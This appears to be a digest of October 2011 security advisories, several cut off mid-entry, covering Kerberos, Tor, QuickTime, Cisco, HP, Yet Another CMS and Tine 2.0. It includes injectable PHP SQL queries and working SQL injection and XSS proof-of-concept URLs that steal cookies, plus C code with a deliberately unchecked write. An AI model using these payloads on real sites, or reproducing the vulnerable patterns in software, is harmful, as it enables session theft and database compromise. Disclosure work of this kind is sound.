MITKRB5-SA-2011-006 KDC denial of service vulnerabilities [CVE-2011-1527 CVE-2011-1528 CVE-2011-1529]
MITKRB5-SA-2011-006

MIT krb5 Security Advisory 2011-006

Original release: 2011-10-18
Last update: 2011-10-18

Topic: KDC denial of service vulnerabilities

CVE-2011-1527: null pointer dereference in KDC LDAP back end

CVSSv2 Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C/E:H/RL:OF/RC:C

CVSSv2 Base Score:      7.8
  Access Vector:          Network
  Access Complexity:      Low
  Authentication:         None
  Confidentiality Impact: None
  Integrity Impact:       None
  Availability Impact:    Complete

CVSSv2 Temporal Score:  6.8
  Exploitability:         High
  Remediation Level:      Official Fix
  Report Confidence:      Confirmed

CVE-2011-1528: assertion failure in multiple KDC back ends

CVSSv2 Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C/E:POC/RL:OF/RC:C
CVSSv2 Base Score:      7.8
CVSSv2 Temporal Score:  6.1

CVE-2011-1529: null pointer dereference in multiple KDC back ends

CVSSv2 Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C/E:POC/RL:OF/RC:C
CVSSv2 Base Score:      7.8
CVSSv2 Temporal Score:  6.1

SUMMARY
=======

CVE-2011-1527: In releases krb5-1.9 and later, the KDC can crash due to a
null pointer dereference if configured to use the LDAP back end. A trigger
condition is publicly known but not known to be widely circulated.

CVE-2011-1528: In releases krb5-1.8 and later, the KDC can crash due to an
assertion failure. No exploit is known to exist, but there is public
evidence that the unidentified trigger condition occurs in the field.

CVE-2011-1529: In releases krb5-1.8 and later, the KDC can crash due to a
null pointer dereference. No exploit is known to exist.

IMPACT
======

CVE-2011-1527: An unauthenticated remote attacker can crash a KDC daemon via
null pointer dereference if the KDC is configured to use the LDAP back end.
(This is not the default configuration.)

CVE-2011-1528: An unauthenticated remote attacker can crash a KDC daemon via
assertion failure.

CVE-2011-1529: An unauthenticated remote attacker can crash a KDC daemon via
null pointer dereference.
AFFECTED SOFTWARE
=================

* The KDC in krb5-1.9 and later is vulnerable to CVE-2011-1527 when
  configured with the LDAP back end. Earlier releases had different code
  that masked this bug and did not crash under these conditions.

* The KDC in krb5-1.8 and later is vulnerable to CVE-2011-1528 when
  configured with the LDAP back end. When configured with the Berkeley DB
  (db2) back end, only releases krb5-1.8 through krb5-1.8.4 are vulnerable.

* The KDC in krb5-1.8 and later is vulnerable to CVE-2011-1529 when
  configured with either the Berkeley DB (db2) or the LDAP back end.

FIXES
=====

* Workaround: restart the KDC when it crashes, possibly using an automated
  monitoring process.

* An upcoming release in the krb5-1.9.x series will fix CVE-2011-1527.

* Upcoming releases in the krb5-1.8.x and krb5-1.9.x series will fix
  CVE-2011-1528 and CVE-2011-1529.

* The patch for krb5-1.9.x is available at

    http://web.mit.edu/kerberos/advisories/2011-006-patch.txt

  A PGP-signed patch is available at

    http://web.mit.edu/kerberos/advisories/2011-006-patch.txt.asc

* The patch for krb5-1.8.x is available at

    http://web.mit.edu/kerberos/advisories/2011-006-patch-r18.txt

  A PGP-signed patch is available at

    http://web.mit.edu/kerberos/advisories/2011-006-patch-r18.txt.asc

REFERENCES
==========

This announcement is posted at:

    http://web.mit.edu/kerberos/advisories/MITKRB5-SA-2011-006.txt

This announcement and related security advisories may be found on the MIT
Kerberos security advisory page at:

    http://web.mit.edu/kerberos/advisories/index.html

The main MIT Kerberos web page is at:

    http://web.mit.edu/kerberos/index.html

CVSSv2:

    http://www.first.org/cvss/cvss-guide.html
    http://nvd.nist.gov/cvss.cfm?calculatoradvversion=2

CVE: CVE-2011-1527
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1527

CVE: CVE-2011-1528
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1528

CVE: CVE-2011-1529
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1529

Debian bug #629558:
    http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=629558

Ubuntu bug #715579:
    https://bugs.launchpad.net/ubuntu/+source/krb5/+bug/715579

ACKNOWLEDGMENTS
===============

CVE-2011-1527: Nalin Dahyabhai and Andrej Ota independently reported this
vulnerability. Kyle Moffett independently reported this bug to Debian.

CVE-2011-1528: Mark Deneen reported this vulnerability to Ubuntu.

CONTACT
=======

The MIT Kerberos Team security contact address is krbcore-secur...@mit.edu.
When sending sensitive information, please PGP-encrypt it using the
following key:

pub   2048R/56CD8F76 2010-12-29 [expires: 2012-02-01]
uid                  MIT Kerberos Team Security Contact krbcore-secur...@mit.edu

DETAILS
=======

CVE-2011-1527: null pointer dereference in KDC LDAP back end

Under certain error conditions, krb5_ldap_get_principal() in the KDC LDAP
back end can return success yet leave the client principal entry as a null
[ GLSA 201110-13 ] Tor: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                   Gentoo Linux Security Advisory GLSA 201110-13
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                           http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: Tor: Multiple vulnerabilities
      Date: October 18, 2011
      Bugs: #351920, #359789
        ID: 201110-13

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities were found in Tor, the most severe of which may
allow a remote attacker to execute arbitrary code.

Background
==========

Tor is an implementation of second generation Onion Routing, a
connection-oriented anonymizing communication service.

Affected packages
=================

    -------------------------------------------------------------------
     Package              /  Vulnerable  /                  Unaffected
    -------------------------------------------------------------------
  1  net-misc/tor             < 0.2.1.30                   >= 0.2.1.30

Description
===========

Multiple vulnerabilities have been discovered in Tor. Please review the CVE
identifiers referenced below for details.

Impact
======

A remote unauthenticated attacker may be able to execute arbitrary code with
the privileges of the Tor process or create a Denial of Service.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Tor users should upgrade to the latest version:

  # emerge --sync
  # emerge --ask --oneshot --verbose ">=net-misc/tor-0.2.1.30"

NOTE: This is a legacy GLSA. Updates for all affected architectures are
available since April 2, 2011. It is likely that your system is already no
longer affected by this issue.

References
==========

[ 1 ] CVE-2011-0015
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0015
[ 2 ] CVE-2011-0016
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0016
[ 3 ] CVE-2011-0427
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0427
[ 4 ] CVE-2011-0490
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0490
[ 5 ] CVE-2011-0491
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0491
[ 6 ] CVE-2011-0492
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0492
[ 7 ] CVE-2011-0493
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0493
[ 8 ] CVE-2011-1924
      http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1924

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-201110-13.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
=======

Copyright 2011 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
ZDI-11-295 : Apple QuickTime FlashPix JPEG Tables Selector Remote Code Execution Vulnerability
ZDI-11-295 : Apple QuickTime FlashPix JPEG Tables Selector Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-11-295
October 18, 2011

-- CVE ID:
CVE-2011-3222

-- CVSS:
7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P

-- Affected Vendors:
Apple

-- Affected Products:
Apple QuickTime

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Apple QuickTime. User interaction is required to
exploit this vulnerability in that the target must visit a malicious page or
open a malicious file.

The specific flaw exists within the way QuickTime handles FlashPix files.
When a FlashPix file contains a tile with Compression Type 0x2 (JPEG) and a
'JPEG tables selector' value that is larger than the global stream property
'Maximum JPEG table index', QuickTime writes outside the global JPEG table.
This corruption could lead to remote code execution in the context of the
current user.

-- Vendor Response:
Apple has issued an update to correct this vulnerability. More details can be
found at:
http://support.apple.com/kb/HT5002

-- Disclosure Timeline:
2011-07-20 - Vulnerability reported to vendor
2011-10-18 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Damian Put

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents a
best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research through
the ZDI can find more information and sign-up at:

    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used.
TippingPoint does not re-sell the vulnerability details or any exploit code.
Instead, upon notifying the affected product vendor, TippingPoint provides
its customers with zero day protection through its intrusion prevention
technology. Explicit details regarding the specifics of the vulnerability are
not exposed to any parties until an official vendor patch is publicly
available. Furthermore, with the altruistic aim of helping to secure a
broader user base, TippingPoint provides this vulnerability information
confidentially to security vendors (including competitors) who have a
vulnerability protection or mitigation product.

Our vulnerability disclosure policy is available online at:

    http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

    http://twitter.com/thezdi
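The selector check the ZDI description implies, as an added example written for this page (not Apple's code or ZDI's). The table-store and tile structures, the 64-byte slot size, the 8-slot backing store and the return codes are assumptions modelled on the advisory's wording, not QuickTime's real FlashPix layout:

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed model of the objects the advisory names (assumption). */
#define FPX_COMPRESSION_JPEG  0x2   /* tile Compression Type for JPEG */
#define JPEG_TABLE_SLOT_BYTES 64    /* assumed fixed size of one table slot */
#define MAX_SLOTS             8     /* capacity of this demo's backing store */

struct jpeg_table_store {
    uint32_t max_table_index;       /* global property "Maximum JPEG table index" */
    uint8_t slots[MAX_SLOTS][JPEG_TABLE_SLOT_BYTES];
};

struct fpx_tile {
    uint32_t compression_type;      /* 0x2 = JPEG */
    uint32_t jpeg_tables_selector;  /* per-tile index into the global table */
    const uint8_t *table_data;      /* JPEG table bytes carried by the tile */
    size_t table_len;
};

/* Slots 0..max_table_index are valid after init; -1 if the store is too small. */
int table_store_init(struct jpeg_table_store *g, uint32_t max_table_index)
{
    if (max_table_index >= MAX_SLOTS) return -1;
    g->max_table_index = max_table_index;
    memset(g->slots, 0, sizeof g->slots);
    return 0;
}

/* The flawed pattern: the tile's selector indexes the global table without
 * being compared to the stream's maximum, so a large selector writes past
 * the table. Shown for contrast only; never called. */
void store_tile_tables_unchecked(struct jpeg_table_store *g, const struct fpx_tile *t)
{
    if (t->compression_type != FPX_COMPRESSION_JPEG) return;
    memcpy(g->slots[t->jpeg_tables_selector], t->table_data, t->table_len);
}

/* Hardened form: reject a selector above the maximum index, and a table that
 * does not fit its slot. Returns 0 on success, 1 for a non-JPEG tile
 * (nothing to store), -1 for a rejected tile. */
int store_tile_tables_checked(struct jpeg_table_store *g, const struct fpx_tile *t)
{
    if (t->compression_type != FPX_COMPRESSION_JPEG) return 1;
    if (t->jpeg_tables_selector > g->max_table_index) return -1;   /* the missing check */
    if (t->table_len > JPEG_TABLE_SLOT_BYTES) return -1;
    memcpy(g->slots[t->jpeg_tables_selector], t->table_data, t->table_len);
    return 0;
}

/* Store a constructed 4-byte table for one tile; returns the checked result,
 * -2 if the store cannot hold max_table_index, -3 if the bytes went astray. */
int demo_tile(uint32_t max_table_index, uint32_t compression, uint32_t selector)
{
    static const uint8_t sample_table[4] = { 0xFF, 0xDB, 0x00, 0x43 }; /* constructed DQT prefix */
    struct jpeg_table_store g;
    struct fpx_tile t = { compression, selector, sample_table, sizeof sample_table };
    if (table_store_init(&g, max_table_index) != 0) return -2;
    int rc = store_tile_tables_checked(&g, &t);
    if (rc == 0 && memcmp(g.slots[selector], sample_table, sizeof sample_table) != 0)
        return -3;
    return rc;
}

int main(void)
{
    printf("selector 3, max index 3: rc=%d\n", demo_tile(3, FPX_COMPRESSION_JPEG, 3));
    printf("selector 4, max index 3: rc=%d\n", demo_tile(3, FPX_COMPRESSION_JPEG, 4));
    return 0;
}
```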
Cisco Security Advisory: Cisco Show and Share Security Vulnerabilities
Cisco Security Advisory: Cisco Show and Share Security Vulnerabilities

Advisory ID: cisco-sa-20111019-sns

Revision 1.0

For Public Release 2011 October 19 16:00 UTC (GMT)

+---------------------------------------------------------------------

Summary
=======

The Cisco Show and Share webcasting and video sharing application contains
two vulnerabilities. The first vulnerability allows an unauthenticated user
to access several administrative web pages. The second vulnerability permits
an authenticated user to execute arbitrary code on the device under the
privileges of the web server user account.

Cisco has released free software updates that address these vulnerabilities.
There are no workarounds available for these vulnerabilities.

This advisory is posted at:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111019-sns

Note: Effective October 18, 2011, Cisco moved the current list of Cisco
Security Advisories and Responses published by Cisco PSIRT. The new location
is:
http://tools.cisco.com/security/center/publicationListing

You can also navigate to this page from the Cisco Products and Services menu
of the Cisco Security Intelligence Operations (SIO) Portal. Following this
transition, new Cisco Security Advisories and Responses will be published to
the new location. Although the URL has changed, the content of security
documents and the vulnerability policy are not impacted. Cisco will continue
to disclose security vulnerabilities in accordance with the published
Security Vulnerability Policy.

Affected Products
=================

Vulnerable Products
+------------------

These vulnerabilities affect all versions of Cisco Show and Share prior to
the first fixed releases as indicated in the Software Version and Fixes
section of this Cisco Security Advisory.

To determine the Cisco Show and Share Software release that an appliance is
running, administrators can log in to the Appliance Administrative Interface
(AAI), and access the main menu. The software version is identified next to
the Cisco Show and Share field. The following example identifies a Cisco
Show and Share appliance running version 5.2.2:

    Cisco Show and Share Application Administration Interface
    Main Menu
    IP: 192.168.0.1
    Cisco Show and Share 5.2.2
    http://sns.example.com/vportal

    SHOW_INFO               Show system information.
    BACKUP_AND_RESTORE      Back up and restore.
    APPLIANCE_CONTROL       Configure advance options
    NETWORK_SETTINGS        Configure network parameters.
    DATE_TIME_SETTINGS      Configure date and time
    CERTIFICATE_MANAGEMENT  Manage all certificates in the system

                  OK                LOG OUT

Products Confirmed Not Vulnerable
+--------------------------------

The following products are confirmed not vulnerable:

  * Cisco Video Portal

No other Cisco products are currently known to be affected by these
vulnerabilities.

Details
=======

Cisco Show and Share is a webcasting and video sharing application that
helps organizations create secure video communities to share ideas and
expertise, optimize global video collaboration, and personalize the
connection between customers, employees, and students with user-generated
content. Cisco Show and Share provides the ability to create live and
on-demand video content, and define who can watch specific content. It
offers viewer collaboration tools such as commenting, rating, and word
tagging, and provides comprehensive access reporting.

Cisco Show and Share contains the following vulnerabilities:

  * Anonymous users can access some administration pages

    Several administrative web pages of Cisco Show and Share can be accessed
    without prior user authentication. These include pages for accessing
    Encoders and Pull Configurations, Push Configurations, Video Encoding
    Formats, and Transcoding.

    This vulnerability is documented in Cisco Bug ID CSCto73758, and has
    been assigned CVE identifier CVE-2011-2584.

  * Cisco Show and Share arbitrary code execution vulnerability

    An authenticated user with privileges to upload videos could upload code
    that could then be executed under the privileges of the web server.

    Note: The web server runs as a non-root user.

    Details regarding the impact of accessing each one of these
    administrative pages are included in the Impact section of this Cisco
    Security Advisory.

    This vulnerability is documented in Cisco Bug ID CSCto69857, and has
    been assigned CVE identifier CVE-2011-2585.

Vulnerability Scoring Details
=============================

Cisco has provided scores for the vulnerabilities in this advisory based on
the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this
Security Advisory is done in accordance with CVSS
Cisco Security Advisory: CiscoWorks Common Services Arbitrary Command Execution Vulnerability
Cisco Security Advisory: CiscoWorks Common Services Arbitrary Command
Execution Vulnerability

Advisory ID: cisco-sa-20111019-cs

Revision 1.0

For Public Release 2011 October 19 16:00 UTC (GMT)

+---------------------------------------------------------------------

Summary
=======

CiscoWorks Common Services for Microsoft Windows contains a vulnerability
that could allow an authenticated, remote attacker to execute arbitrary
commands on the affected system with the privileges of a system
administrator.

Cisco has released free software updates that address this vulnerability.
There are no workarounds that mitigate this vulnerability.

This advisory is posted at:
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111019-cs

Note: Effective October 18, 2011, Cisco moved the current list of Cisco
Security Advisories and Responses published by Cisco PSIRT. The new location
is:
http://tools.cisco.com/security/center/publicationListing

You can also navigate to this page from the Cisco Products and Services menu
of the Cisco Security Intelligence Operations (SIO) Portal. Following this
transition, new Cisco Security Advisories and Responses will be published to
the new location. Although the URL has changed, the content of security
documents and the vulnerability policy are not impacted. Cisco will continue
to disclose security vulnerabilities in accordance with the published
Security Vulnerability Policy.

Affected Products
=================

Vulnerable Products
+------------------

This vulnerability affects all versions of CiscoWorks Common Services-based
products running on Microsoft Windows. Common Services version 4.1 and later
are not affected by this vulnerability.

The following CiscoWorks products with the default Common Services installed
are affected by this vulnerability, due to their underlying Common Services
version:

  * CiscoWorks LAN Management Solution

    +-------------------------------------+--------------------------+
    | LAN Management Solution Versions    | Common Services Versions |
    |-------------------------------------+--------------------------|
    | Prior to 3.2 on Microsoft Windows   | Various                  |
    |-------------------------------------+--------------------------|
    | 3.2 on Microsoft Windows            | 3.3                      |
    |-------------------------------------+--------------------------|
    | 3.2.1 on Microsoft Windows          | 3.3.1                    |
    |-------------------------------------+--------------------------|
    | 4.0 on Microsoft Windows            | 4.0                      |
    |-------------------------------------+--------------------------|
    | 4.0.1 on Microsoft Windows          | 4.0.1                    |
    +-------------------------------------+--------------------------+

    Note: CiscoWorks LAN Management Solution versions prior to 3.2 reached
    end of software maintenance. Customers should contact their Cisco
    support team for assistance in upgrading to a supported version of
    CiscoWorks LAN Management Solution.

  * Cisco Security Manager

    +---------------------------------------------------+-----------------+
    | Security Manager Versions                         | Common Services |
    |                                                   | Versions        |
    |---------------------------------------------------+-----------------|
    | Prior to 3.2                                      | Various         |
    |---------------------------------------------------+-----------------|
    | 3.2, 3.2 SP1, 3.2 SP2                             | 3.1             |
    |---------------------------------------------------+-----------------|
    | 3.2.1, 3.2.1 SP1                                  | 3.1.1           |
    |---------------------------------------------------+-----------------|
    | 3.2.2, 3.2.2 SP1, 3.2.2 SP2, 3.2.2 SP3,           | 3.2             |
    | 3.2.2 SP4                                         |                 |
    |---------------------------------------------------+-----------------|
    | 3.3, 3.3 SP1, 3.3 SP2                             | 3.2             |
    |---------------------------------------------------+-----------------|
    | 3.3.1, 3.3.1 SP1, 3.3.1 SP2, 3.3.1 SP3            | 3.2             |
    |---------------------------------------------------+-----------------|
    | 4.0, 4.0 SP1                                      | 3.3             |
    |---------------------------------------------------+-----------------|
    | 4.0.1, 4.0.1 SP1                                  | 3.3             |
    |---------------------------------------------------+-----------------|
    | 4.1                                               | 3.3             |
    +---------------------------------------------------+-----------------+

    Note: Cisco Security Manager versions prior to 3.2 reached end of
    software maintenance. Customers should contact their Cisco support team
    for assistance in upgrading to a supported version of
Yet Another CMS 1.0 SQL Injection XSS vulnerabilities
Advisory: Yet Another CMS 1.0 SQL Injection XSS vulnerabilities
Advisory ID: SSCHADV2011-031
Author: Stefan Schurtz
Affected Software: Successfully tested on Yet Another CMS 1.0
Vendor URL: http://yetanothercms.codeplex.com/
Vendor Status: informed
EDB-ID: 17997

==========================
Vulnerability Description:
==========================

Yet Another CMS 1.0 is prone to multiple SQL Injection and XSS vulnerabilities

==================
Technical Details:
==================

// search.php
$result_set = get_search_result_set($_POST['pattern']);

// includes/functions.php
function get_search_result_set($pattern, $public = true) {
    global $connection;
    // $pattern arrives straight from POST and is concatenated into the SQL
    $query = "SELECT id, subject_id, menu_name, position, visible, content, " .
             "CONCAT('... ', SUBSTRING(content, LOCATE('" . $pattern . "', content), 200), ' ...') as fragment " .
             "FROM pages " .
             "WHERE content like '%" . $pattern . "%'";

// index.php
<?php find_selected_page(); ?>

// includes/functions.php
function find_selected_page() {
    global $sel_subject;
    global $sel_page;
    if (isset($_GET['subj'])) {
        $sel_subject = get_subject_by_id($_GET['subj']);
        $sel_page = get_default_page($sel_subject['id']);
    } elseif (isset($_GET['page'])) {
        $sel_subject = NULL;
        $sel_page = get_page_by_id($_GET['page']);
    } else {
        $sel_subject = NULL;
        $sel_page = NULL;
    }
}

function get_page_by_id($page_id) {
    global $connection;
    // $page_id arrives straight from GET and is concatenated into the SQL
    $query = "SELECT * ";
    $query .= "FROM pages ";
    $query .= "WHERE id=" . $page_id . " ";
    $query .= "LIMIT 1";

========
Exploit
========

SQL Injection

http://target/index.php?page=[sql injection]
http://target/search.php - 'search field' - [sql injection]

XSS

http://target/search.php - 'search field' - '</script><script>alert(document.cookie)</script>
http://target/index.php?page='</script><script>alert(document.cookie)</script>

=========
Solution:
=========

-

====================
Disclosure Timeline:
====================

18-Oct-2011 - informed developers
19-Oct-2011 - release date of this security advisory

========
Credits:
========

Vulnerabilities found and advisory written by Stefan Schurtz.

===========
References:
===========

http://yetanothercms.codeplex.com/
http://yetanothercms.codeplex.com/workitem/643
http://www.rul3z.de/advisories/SSCHADV2011-031.txt
[security bulletin] HPSBPI02711 SSRT100647 rev.1 - HP MFP Digital Sending Software Running on Windows, Local Information Disclosure
SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03052686
Version: 1

HPSBPI02711 SSRT100647 rev.1 - HP MFP Digital Sending Software Running on
Windows, Local Information Disclosure

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2011-10-19
Last Updated: 2011-10-19

Potential Security Impact: Local information disclosure

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP MFP Digital
Sending Software running on Windows. The vulnerability could result in
disclosure of personal information contained in workflow metadata to
unintended recipients.

References: CVE-2011-3163

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP MFP Digital Sending Software v4.91.21 and all previous 4.9x versions

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
  Reference              Base Vector             Base Score
CVE-2011-3163    (AV:L/AC:H/Au:N/C:P/I:N/A:N)       1.2
===========================================================
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has provided HP MFP Digital Sending Software v4.20 to resolve the
vulnerability.

HP MFP Digital Sending Software v4.20 can be downloaded from
http://www.hp.com/go/dss

Note: Select DSS 4 free 60-day demo.

HISTORY
Version:1 (rev.1) - 19 October 2011 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support
channel.

Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin List: A list of HP Security Bulletins, updated
periodically, is contained in HP Security Notice HPSN-2011-001:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2011 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial
errors or omissions contained herein. The information provided is provided
"as is" without warranty of any kind. To the extent permitted by law,
neither HP or its affiliates, subcontractors or suppliers will be liable for
incidental, special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.
Multiple vulnerabilities in Tine 2.0
Vulnerability ID: HTB23050
Reference: https://www.htbridge.ch/advisory/multiple_vulnerabilities_in_tine_2_0.html
Product: Tine 2.0
Vendor: Metaways Infosystems GmbH ( http://www.tine20.org )
Vulnerable Version: Maischa (2011/05) and probably prior
Tested Version: Maischa (2011/05)
Vendor Notification: 28 September 2011
Vulnerability Type: XSS (Cross Site Scripting)
Status: Fixed by Vendor
Risk level: Medium
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ )

Vulnerability Details:

High-Tech Bridge SA Security Research Lab has discovered multiple
vulnerabilities in Tine 2.0, which can be exploited to perform cross-site
scripting attacks.

1) Input passed via the lang GET parameter to
/library/idnaconvert/example.php is not properly sanitised before being
returned to the user. This can be exploited to execute arbitrary HTML and
script code in a user's browser session in the context of the affected
website.

The following PoC code is available:

http://[host]/library/idnaconvert/example.php?lang=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

2) Input appended to the URL after /library/idnaconvert/example.php is not
properly sanitised before being returned to the user. This can be exploited
to execute arbitrary HTML and script code in a user's browser session in the
context of the affected site.

The following PoC is available:

http://[host]/library/idnaconvert/example.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

Successful exploitation of this vulnerability requires that Apache's
directive AcceptPathInfo is set to on or default (the default value is
default).

3) Input appended to the URL after
/library/phpexcel/phpexcel/shared/jama/docs/download.php is not properly
sanitised before being returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in the
context of the affected site.

The following PoC is available:

http://[host]/library/phpexcel/phpexcel/shared/jama/docs/download.php/%27%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

Successful exploitation of this vulnerability requires that Apache's
directive AcceptPathInfo is set to on or default (the default value is
default).

Solution: Upgrade to the most recent version

Disclaimer: Details of this Advisory may be updated in order to provide as
accurate information as possible. The latest version of the Advisory is
available on the web page in the Reference field.
[security bulletin] HPSBMU02716 SSRT100651 rev.1 - HP Data Protector Notebook Extension, Remote Execution of Arbitrary Code
SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c03058866
Version: 1

HPSBMU02716 SSRT100651 rev.1 - HP Data Protector Notebook Extension, Remote
Execution of Arbitrary Code

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2011-10-18
Last Updated: 2011-10-18

Potential Security Impact: Remote execution of arbitrary code

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP Data
Protector Notebook Extension. These vulnerabilities could be remotely
exploited to allow execution of arbitrary code.

References: CVE-2011-3156 (ZDI-CAN-1222), CVE-2011-3157 (ZDI-CAN-1225),
CVE-2011-3158 (ZDI-CAN-1226), CVE-2011-3159 (ZDI-CAN-1227),
CVE-2011-3160 (ZDI-CAN-1228), CVE-2011-3161 (ZDI-CAN-1229),
CVE-2011-3162 (ZDI-CAN-1296).

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP Data Protector Notebook Extension version 6.20, running on Windows
platform (2000, 2003, XP, 2008, Vista, Win7).
HP Data Protector for Personal Computers version 7.0, running on Windows
platform (2000, 2003, XP, 2008, Vista, Win7).

BACKGROUND

CVSS 2.0 Base Metrics
===========================================================
  Reference              Base Vector             Base Score
CVE-2011-3156    (AV:N/AC:L/Au:N/C:C/I:C/A:C)       10
CVE-2011-3157    (AV:N/AC:L/Au:N/C:C/I:C/A:C)       10
CVE-2011-3158    (AV:N/AC:L/Au:N/C:C/I:C/A:C)       10
CVE-2011-3159    (AV:N/AC:L/Au:N/C:C/I:C/A:C)       10
CVE-2011-3160    (AV:N/AC:L/Au:N/C:C/I:C/A:C)       10
CVE-2011-3161    (AV:N/AC:L/Au:N/C:C/I:C/A:C)       10
CVE-2011-3162    (AV:N/AC:L/Au:N/C:C/I:C/A:C)       10
===========================================================
 Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002

The Hewlett-Packard Company thanks Andrea Micalizzi aka rgod along with
TippingPoint's Zero Day Initiative for reporting these vulnerabilities to
security-al...@hp.com.

RESOLUTION

HP has provided the following patch to resolve these vulnerabilities.
The patch can be retrieved from http://support.openview.hp.com/selfsolve/patches

For HP Data Protector Notebook Extension v6.20

  Operating System Platform                       Patch ID
  Windows (2000, 2003, XP, 2008, Vista, Win 7)    DPPCWIN_1

For HP Data Protector for Personal Computers v7.0

  Operating System Platform                       Patch ID
  Windows (2000, 2003, XP, 2008, Vista, Win 7)    DPPCWIN_1

HISTORY
Version: 1 (rev.1) - 18 October 2011 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support
channel.

Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-al...@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins

Security Bulletin List: A list of HP Security Bulletins, updated
periodically, is contained in HP Security Notice HPSN-2011-001:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430

3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2011 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial
errors or omissions contained herein. The information provided is provided
"as is" without warranty of any kind. To the extent permitted by law,
neither HP or its affiliates, subcontractors or suppliers will be liable for
incidental, special or consequential damages including downtime cost; lost
